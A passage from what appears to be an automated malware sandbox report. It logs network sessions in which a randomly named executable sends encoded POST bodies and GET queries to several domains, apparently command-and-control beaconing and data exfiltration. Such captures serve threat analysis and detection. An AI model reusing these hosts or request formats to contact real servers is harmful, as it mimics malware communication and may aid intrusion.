                                                            Host: www.martinminorgroup.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 222
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.martinminorgroup.com
                                                            Referer: http://www.martinminorgroup.com/oyqt/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 74 4f 47 38 7a 74 4a 62 78 35 70 33 4b 4b 49 64 32 5a 7a 73 70 4c 35 61 74 52 7a 55 76 56 75 63 72 4f 46 58 78 50 7a 7a 45 39 6e 36 32 62 47 42 6d 6f 53 33 55 4f 6a 78 6e 4d 67 56 75 71 38 62 33 62 44 53 6a 2f 55 30 2f 63 63 44 65 71 37 30 50 4c 53 53 6d 58 71 42 4c 51 38 30 54 35 67 33 53 70 6a 43 7a 4c 57 41 6e 4a 33 6d 64 32 75 53 50 2b 67 61 62 43 72 67 4f 5a 2f 6d 4e 30 34 58 45 50 70 59 4d 30 42 52 44 37 56 4c 38 58 31 51 68 4d 61 43 76 61 42 61 53 58 43 78 6d 53 52 44 69 4e 56 48 51 39 48 50 70 6f 47 74 6b 78 52 2b 46 45 58 74 79 46 7a 51 79 67 61 4e 42 73 6d 67 51 65 73 4c 68 71 68 4b 72 62 45 72 69 56 33 50 33 51 74 30 48 66 51 3d
                                                            Data Ascii: 4NZpb=tOG8ztJbx5p3KKId2ZzspL5atRzUvVucrOFXxPzzE9n62bGBmoS3UOjxnMgVuq8b3bDSj/U0/ccDeq70PLSSmXqBLQ80T5g3SpjCzLWAnJ3md2uSP+gabCrgOZ/mN04XEPpYM0BRD7VL8X1QhMaCvaBaSXCxmSRDiNVHQ9HPpoGtkxR+FEXtyFzQygaNBsmgQesLhqhKrbEriV3P3Qt0HfQ=
                                                            Aug 28, 2024 14:04:26.541315079 CEST | 396 | IN | HTTP/1.1 301 Moved Permanently
                                                            Content-Length: 0
                                                            Location: https://www.martinminorgroup.com/oyqt/
                                                            Accept-Ranges: bytes
                                                            Date: Wed, 28 Aug 2024 12:04:26 GMT
                                                            X-Served-By: cache-iad-kjyo7100105-IAD
                                                            X-Cache: MISS
                                                            X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,pmHZlB45NPy7b1VBAukQrewfbs+7qUVAqsIx00yI78k=
                                                            Via: 1.1 google
                                                            glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                            Connection: close


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            22 | 192.168.2.4 | 49764 | 34.149.87.45 | 80 | 792 | C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Aug 28, 2024 14:04:28.579457998 CEST | 10899 | OUT | POST /oyqt/ HTTP/1.1
                                                            Host: www.martinminorgroup.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 10302
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.martinminorgroup.com
                                                            Referer: http://www.martinminorgroup.com/oyqt/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 74 4f 47 38 7a 74 4a 62 78 35 70 33 4b 4b 49 64 32 5a 7a 73 70 4c 35 61 74 52 7a 55 76 56 75 63 72 4f 46 58 78 50 7a 7a 45 39 66 36 31 70 65 42 67 4b 36 33 56 4f 6a 78 34 38 67 55 75 71 39 48 33 62 62 65 6a 36 4e 44 2f 5a 41 44 52 6f 7a 30 4f 36 53 53 78 48 71 42 44 77 38 33 4f 70 67 48 53 70 7a 47 7a 4c 47 41 6e 4a 33 6d 64 77 71 53 49 73 49 61 64 43 72 6a 45 35 2f 69 61 6b 34 2f 45 50 78 69 4d 30 30 7a 44 72 31 4c 38 33 46 51 6b 2f 2b 43 79 71 42 55 56 58 43 54 6d 53 4e 63 69 4e 59 32 51 2b 62 31 70 6f 69 74 6b 48 39 39 61 41 54 6b 73 32 37 52 73 69 79 63 4a 65 65 53 63 39 59 66 79 37 35 57 30 4a 31 5a 6e 48 4f 2f 75 41 4a 6b 63 4c 4d 30 6a 69 54 43 6f 43 51 4f 4a 37 48 50 6a 43 4f 37 65 7a 44 31 4a 35 38 78 2b 74 56 34 50 77 33 4d 5a 62 4e 69 59 65 43 4b 2b 59 6f 77 4b 76 72 55 77 6f 6e 52 66 38 70 39 34 33 6d 48 6a 72 49 6c 5a 70 44 51 74 76 2f 76 6f 53 67 67 34 57 6e 2f 7a 30 45 59 7a 57 54 73 63 41 52 4f 37 64 77 59 36 38 6b 74 47 49 61 4c 37 70 44 54 78 48 6b 48 78 77 63 6f [TRUNCATED]
                                                            Data Ascii: 4NZpb=tOG8ztJbx5p3KKId2ZzspL5atRzUvVucrOFXxPzzE9f61peBgK63VOjx48gUuq9H3bbej6ND/ZADRoz0O6SSxHqBDw83OpgHSpzGzLGAnJ3mdwqSIsIadCrjE5/iak4/EPxiM00zDr1L83FQk/+CyqBUVXCTmSNciNY2Q+b1poitkH99aATks27RsiycJeeSc9Yfy75W0J1ZnHO/uAJkcLM0jiTCoCQOJ7HPjCO7ezD1J58x+tV4Pw3MZbNiYeCK+YowKvrUwonRf8p943mHjrIlZpDQtv/voSgg4Wn/z0EYzWTscARO7dwY68ktGIaL7pDTxHkHxwcoBsJmiUytdsfZvN+mSqqVGw8o2NlcSCNWzZtWDGC72fN3f/v+EgY53FCfWc8+bgM801f/9IuEP6HtxEuM6YF4AlqE5HcEBAxH0DVIXoi7AXXM/5W40F547WiBwe+l8sai6TH+gdF/DGaTdgf5A8JCZZ99odM5vz9f+qIm8WZXOgCyk0m1BpHSeZTZgjkdo4FfzCkrnJ7rqz2xHkgYg3r3GBIs4BaNyIT6q2ZdvH4QAPC5eM/DdbvrIfA8WFWlB9UR5jHZS3nmv6gwBewMRkW5SWxF/wL3ybLMm4DHD5lgSZa8JhWDI17zlC4m/D7ZHAGyRkiMpys5Vhu1AyYXRJNNWN948/DBiKZYhdh+yNE6JbmoakknlRYlAe6xkHRv5EfXUmfI1/rC+uukfYl+3y9Z0Ef2ZGlS0TEGh7/EH7OZHEc4A8miwp3UeNM+zb9HLczIuDT7GGNW47d/qKHjmMaDtaVTFmfeQoCdeP4MS8FneBDzExeyiVGBksmVrAx9RLsrIrERQoW66OHw4yap8HBO4u7W7oN4PDgMFT2QLQkJgIKuWtPpIUNMbOtgbeT/aUaiOihhh8udqcM66ASX5Cjj3WTRLTkm7YHoXXMutjGEUhZHBfwPsaWesM7j391lX5F6N5VdHIvBZtcl/2TcA9PwqIZzQgoFoBNkif [TRUNCATED]
                                                            Aug 28, 2024 14:04:29.049917936 CEST | 396 | IN | HTTP/1.1 301 Moved Permanently
                                                            Content-Length: 0
                                                            Location: https://www.martinminorgroup.com/oyqt/
                                                            Accept-Ranges: bytes
                                                            Date: Wed, 28 Aug 2024 12:04:28 GMT
                                                            X-Served-By: cache-iad-kcgs7200044-IAD
                                                            X-Cache: MISS
                                                            X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,oDbbMvfdXCdtsgjD2KgaM8iHE4dbw+wewoJ5nvKoyjE=
                                                            Via: 1.1 google
                                                            glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                            Connection: close


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            23 | 192.168.2.4 | 49765 | 34.149.87.45 | 80 | 792 | C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Aug 28, 2024 14:04:31.110239029 CEST | 520 | OUT | GET /oyqt/?4NZpb=gMucwdth+5AZeK0KmeCwg6JXtjbNjF2X/qMFvsioBcCD3J/exIyWWtfFndAKxK5F+q3cxNofi58aVYrjNb2yynOtUExsW7cyS5fcrIrRvKGYIlrNRN4ZbU0=&8le=9XPp_0_hUrF45X HTTP/1.1
                                                            Host: www.martinminorgroup.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Aug 28, 2024 14:04:31.579495907 CEST | 542 | IN | HTTP/1.1 301 Moved Permanently
                                                            Content-Length: 0
                                                            Location: https://www.martinminorgroup.com/oyqt/?4NZpb=gMucwdth+5AZeK0KmeCwg6JXtjbNjF2X/qMFvsioBcCD3J/exIyWWtfFndAKxK5F+q3cxNofi58aVYrjNb2yynOtUExsW7cyS5fcrIrRvKGYIlrNRN4ZbU0=&8le=9XPp_0_hUrF45X
                                                            Accept-Ranges: bytes
                                                            Date: Wed, 28 Aug 2024 12:04:31 GMT
                                                            X-Served-By: cache-iad-kjyo7100149-IAD
                                                            X-Cache: MISS
                                                            X-Seen-By: yvSunuo/8ld62ehjr5B7kA==,jKB0KR2wTEE1MYSdxvKSbciHE4dbw+wewoJ5nvKoyjE=
                                                            Via: 1.1 google
                                                            glb-x-seen-by: bS8wRlGzu0Hc+WrYuHB8QIg44yfcdCMJRkBoQ1h6Vjc=
                                                            Connection: close


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            24 | 192.168.2.4 | 49766 | 3.33.130.190 | 80 | 792 | C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Aug 28, 2024 14:04:36.612497091 CEST | 791 | OUT | POST /pbzm/ HTTP/1.1
                                                            Host: www.atlpicsstudios.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 202
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.atlpicsstudios.com
                                                            Referer: http://www.atlpicsstudios.com/pbzm/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 4b 79 79 6b 56 73 2f 32 65 52 6b 48 71 4c 67 66 67 52 7a 4a 6e 4d 56 38 38 71 2b 64 51 45 75 64 54 7a 68 65 75 49 75 63 73 53 63 51 45 74 4b 54 72 6c 51 47 66 41 43 70 47 54 7a 31 6e 69 6a 35 53 41 5a 6b 4f 51 2b 44 51 6d 55 6e 57 44 32 63 65 54 53 4d 32 38 69 31 37 35 72 55 78 53 58 76 41 4f 72 31 79 67 38 6e 6c 5a 70 62 57 58 73 31 66 4b 70 2b 7a 46 69 6e 6f 32 73 70 32 42 52 48 38 58 55 47 52 38 6d 55 74 32 6a 74 34 74 41 53 36 6e 6d 48 78 46 55 58 76 56 58 4b 78 51 7a 2b 6b 71 31 30 4d 74 2f 53 44 65 33 39 52 53 33 4d 5a 65 2f 2f 6a 5a 2f 4d 5a 55 71 72 6b 79 32 30 2f 41 3d 3d
                                                            Data Ascii: 4NZpb=KyykVs/2eRkHqLgfgRzJnMV88q+dQEudTzheuIucsScQEtKTrlQGfACpGTz1nij5SAZkOQ+DQmUnWD2ceTSM28i175rUxSXvAOr1yg8nlZpbWXs1fKp+zFino2sp2BRH8XUGR8mUt2jt4tAS6nmHxFUXvVXKxQz+kq10Mt/SDe39RS3MZe//jZ/MZUqrky20/A==


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            25 | 192.168.2.4 | 49767 | 3.33.130.190 | 80 | 792 | C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Aug 28, 2024 14:04:39.141765118 CEST | 811 | OUT | POST /pbzm/ HTTP/1.1
                                                            Host: www.atlpicsstudios.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 222
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.atlpicsstudios.com
                                                            Referer: http://www.atlpicsstudios.com/pbzm/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 4b 79 79 6b 56 73 2f 32 65 52 6b 48 70 72 77 66 69 79 72 4a 68 73 56 2f 7a 4b 2b 64 4b 30 75 52 54 7a 39 65 75 4a 71 4d 73 68 6f 51 48 4d 61 54 71 67 6b 47 63 41 43 70 66 6a 7a 30 70 43 69 33 53 42 6c 73 4f 56 47 44 51 69 38 6e 57 47 53 63 65 6b 2b 50 33 73 69 33 33 5a 72 57 2f 79 58 76 41 4f 72 31 79 6a 41 4e 6c 5a 68 62 57 69 6b 31 64 72 70 39 2b 6c 69 6b 70 32 73 70 38 68 52 4c 38 58 55 77 52 39 36 75 74 77 6e 74 34 6f 45 53 36 56 4f 47 6d 31 56 63 68 31 57 34 30 31 50 7a 72 61 6f 6e 50 71 58 6a 41 76 6a 65 51 55 6d 57 49 76 65 6f 78 5a 62 2f 45 54 6a 66 70 78 4c 39 6b 4f 54 2f 68 38 6a 4d 54 52 37 58 44 34 75 74 75 43 7a 47 74 33 6b 3d
                                                            Data Ascii: 4NZpb=KyykVs/2eRkHprwfiyrJhsV/zK+dK0uRTz9euJqMshoQHMaTqgkGcACpfjz0pCi3SBlsOVGDQi8nWGScek+P3si33ZrW/yXvAOr1yjANlZhbWik1drp9+likp2sp8hRL8XUwR96utwnt4oES6VOGm1Vch1W401PzraonPqXjAvjeQUmWIveoxZb/ETjfpxL9kOT/h8jMTR7XD4utuCzGt3k=


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            26 | 192.168.2.4 | 49768 | 3.33.130.190 | 80 | 792 | C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Aug 28, 2024 14:04:41.677159071 CEST | 10893 | OUT | POST /pbzm/ HTTP/1.1
                                                            Host: www.atlpicsstudios.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 10302
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.atlpicsstudios.com
                                                            Referer: http://www.atlpicsstudios.com/pbzm/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 4b 79 79 6b 56 73 2f 32 65 52 6b 48 70 72 77 66 69 79 72 4a 68 73 56 2f 7a 4b 2b 64 4b 30 75 52 54 7a 39 65 75 4a 71 4d 73 68 77 51 45 2b 43 54 72 44 4d 47 64 41 43 70 58 44 7a 78 70 43 6a 72 53 42 39 6f 4f 56 43 35 51 6b 34 6e 45 31 71 63 59 56 2b 50 2b 73 69 33 2f 35 72 54 78 53 57 6c 41 4b 33 78 79 67 34 4e 6c 5a 68 62 57 6a 55 31 61 36 70 39 34 6c 69 6e 6f 32 73 75 32 42 51 69 38 58 38 67 52 39 2b 45 74 6a 76 74 34 49 30 53 38 77 36 47 36 6c 56 65 69 31 57 67 30 31 4b 7a 72 61 45 72 50 76 72 46 41 76 58 65 52 6a 48 73 63 4f 75 69 67 6f 32 6a 66 42 4c 2b 6e 53 37 37 71 4d 37 42 6d 5a 37 31 45 53 66 69 50 76 62 39 71 67 33 4f 33 44 50 62 46 70 49 30 6f 78 62 56 6a 4d 4d 64 32 38 38 75 45 7a 61 7a 36 35 49 61 76 38 4d 6a 5a 68 57 35 38 59 31 6d 5a 49 42 30 74 48 42 67 4a 78 78 74 58 54 64 65 4b 4f 6f 73 48 50 77 51 44 67 56 70 78 63 54 43 69 73 49 57 7a 41 4d 38 6f 47 6e 67 77 73 6e 4a 4d 50 30 43 66 79 6e 78 2b 53 68 58 4c 43 74 50 69 71 78 30 2f 64 50 59 42 67 47 45 6e 46 34 58 [TRUNCATED]
                                                            Data Ascii: 4NZpb= [TRUNCATED]


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            27 | 192.168.2.4 | 49769 | 3.33.130.190 | 80 | 792 | C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Aug 28, 2024 14:04:44.204821110 CEST | 518 | OUT | GET /pbzm/?8le=9XPp_0_hUrF45X&4NZpb=HwaEWaT+MjEw+cAv/0CZgPde8deDTU2vHW5LybGuoxkcBujuyjcadGeIGCLe+wG1UztIBTmLVXM7VEOESleyo4Gnh+/Z8BS9Eeff6SBCwIklVDVFELQp+3s= HTTP/1.1
                                                            Host: www.atlpicsstudios.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Aug 28, 2024 14:04:44.667821884 CEST | 400 | IN | HTTP/1.1 200 OK
                                                            Server: openresty
                                                            Date: Wed, 28 Aug 2024 12:04:44 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 260
                                                            Connection: close
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 38 6c 65 3d 39 58 50 70 5f 30 5f 68 55 72 46 34 35 58 26 34 4e 5a 70 62 3d 48 77 61 45 57 61 54 2b 4d 6a 45 77 2b 63 41 76 2f 30 43 5a 67 50 64 65 38 64 65 44 54 55 32 76 48 57 35 4c 79 62 47 75 6f 78 6b 63 42 75 6a 75 79 6a 63 61 64 47 65 49 47 43 4c 65 2b 77 47 31 55 7a 74 49 42 54 6d 4c 56 58 4d 37 56 45 4f 45 53 6c 65 79 6f 34 47 6e 68 2b 2f 5a 38 42 53 39 45 65 66 66 36 53 42 43 77 49 6b 6c 56 44 56 46 45 4c 51 70 2b 33 73 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?8le=9XPp_0_hUrF45X&4NZpb=HwaEWaT+MjEw+cAv/0CZgPde8deDTU2vHW5LybGuoxkcBujuyjcadGeIGCLe+wG1UztIBTmLVXM7VEOESleyo4Gnh+/Z8BS9Eeff6SBCwIklVDVFELQp+3s="}</script></head></html>


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            28 | 192.168.2.4 | 49770 | 142.250.186.147 | 80 | 792 | C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Aug 28, 2024 14:04:49.908469915 CEST | 797 | OUT | POST /ehr0/ HTTP/1.1
                                                            Host: www.openhandedvision.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 202
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.openhandedvision.com
                                                            Referer: http://www.openhandedvision.com/ehr0/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 46 6a 5a 55 6a 57 43 79 6d 61 6e 43 69 4f 36 57 49 31 4c 36 7a 6f 73 71 30 74 2b 4b 66 33 64 2b 6f 37 77 42 43 79 62 47 49 66 4f 34 76 48 71 45 5a 67 6d 4d 30 7a 78 31 57 72 46 50 4c 6a 57 44 6e 2b 77 6b 33 6e 39 46 62 4c 57 50 78 6d 70 58 77 50 6a 6f 38 36 75 68 69 53 53 6e 45 75 53 63 35 71 6b 35 65 4c 34 4f 4a 2f 35 71 68 70 55 6f 6b 2b 47 41 41 79 39 49 73 2b 6f 74 51 76 45 2b 35 43 68 64 71 33 38 4f 6d 4c 69 64 33 47 46 51 65 62 72 6f 33 74 44 30 76 6f 41 52 53 38 62 48 74 69 5a 77 63 31 31 32 43 61 34 75 30 34 42 2f 68 39 71 33 54 57 70 43 55 32 77 39 55 31 54 43 6f 51 3d 3d
                                                            Data Ascii: 4NZpb=FjZUjWCymanCiO6WI1L6zosq0t+Kf3d+o7wBCybGIfO4vHqEZgmM0zx1WrFPLjWDn+wk3n9FbLWPxmpXwPjo86uhiSSnEuSc5qk5eL4OJ/5qhpUok+GAAy9Is+otQvE+5Chdq38OmLid3GFQebro3tD0voARS8bHtiZwc112Ca4u04B/h9q3TWpCU2w9U1TCoQ==
                                                            Aug 28, 2024 14:04:51.095119953 CEST | 410 | IN | HTTP/1.1 301 Moved Permanently
                                                            Content-Type: application/binary
                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                            Date: Wed, 28 Aug 2024 12:04:50 GMT
                                                            Location: https://www.openhandedvision.com/ehr0/
                                                            Server: ESF
                                                            Content-Length: 0
                                                            X-XSS-Protection: 0
                                                            X-Frame-Options: SAMEORIGIN
                                                            X-Content-Type-Options: nosniff
                                                            Connection: close


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            29 | 192.168.2.4 | 49771 | 142.250.186.147 | 80 | 792 | C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Aug 28, 2024 14:04:52.440644979 CEST | 817 | OUT | POST /ehr0/ HTTP/1.1
                                                            Host: www.openhandedvision.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 222
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.openhandedvision.com
                                                            Referer: http://www.openhandedvision.com/ehr0/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                            Data Raw: 34 4e 5a 70 62 3d 46 6a 5a 55 6a 57 43 79 6d 61 6e 43 6a 74 69 57 50 55 4c 36 30 49 73 74 78 74 2b 4b 56 58 64 79 6f 36 4d 42 43 33 37 57 49 74 61 34 76 6c 79 45 59 6b 53 4d 6e 44 78 31 5a 4c 46 4f 42 44 57 49 6e 2b 4d 53 33 6c 70 46 62 4c 53 50 78 6e 5a 58 77 2b 6a 76 39 71 75 6a 2b 53 53 70 41 75 53 63 35 71 6b 35 65 4c 73 33 4a 2f 68 71 68 5a 45 6f 6a 72 71 44 4b 53 39 4c 38 75 6f 74 55 76 45 36 35 43 68 37 71 79 59 30 6d 4a 61 64 33 44 68 51 65 50 33 76 39 74 44 36 6c 49 42 4e 42 2f 2b 73 68 68 6b 51 62 32 56 35 43 6f 34 34 38 65 51 6c 77 4d 4c 67 42 57 4e 78 4a 78 35 4a 5a 32 75 4c 7a 63 4a 4d 67 63 2f 72 6c 64 38 72 78 75 67 5a 55 2f 32 31 34 63 55 3d
                                                            Data Ascii: 4NZpb=FjZUjWCymanCjtiWPUL60Istxt+KVXdyo6MBC37WIta4vlyEYkSMnDx1ZLFOBDWIn+MS3lpFbLSPxnZXw+jv9quj+SSpAuSc5qk5eLs3J/hqhZEojrqDKS9L8uotUvE65Ch7qyY0mJad3DhQeP3v9tD6lIBNB/+shhkQb2V5Co448eQlwMLgBWNxJx5JZ2uLzcJMgc/rld8rxugZU/214cU=
                                                            Aug 28, 2024 14:04:53.282835007 CEST | 410 | IN | HTTP/1.1 301 Moved Permanently
                                                            Content-Type: application/binary
                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                            Pragma: no-cache
                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                            Date: Wed, 28 Aug 2024 12:04:53 GMT
                                                            Location: https://www.openhandedvision.com/ehr0/
                                                            Server: ESF
                                                            Content-Length: 0
                                                            X-XSS-Protection: 0
                                                            X-Frame-Options: SAMEORIGIN
                                                            X-Content-Type-Options: nosniff
                                                            Connection: close


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            30 | 192.168.2.4 | 49772 | 142.250.186.147 | 80 | 792 | C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Aug 28, 2024 14:04:54.973089933 CEST | 10899 | OUT | POST /ehr0/ HTTP/1.1
                                                            Host: www.openhandedvision.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Accept-Encoding: gzip, deflate, br
                                                            Content-Length: 10302
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: no-cache
                                                            Connection: close
                                                            Origin: http://www.openhandedvision.com
                                                            Referer: http://www.openhandedvision.com/ehr0/
                                                            User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
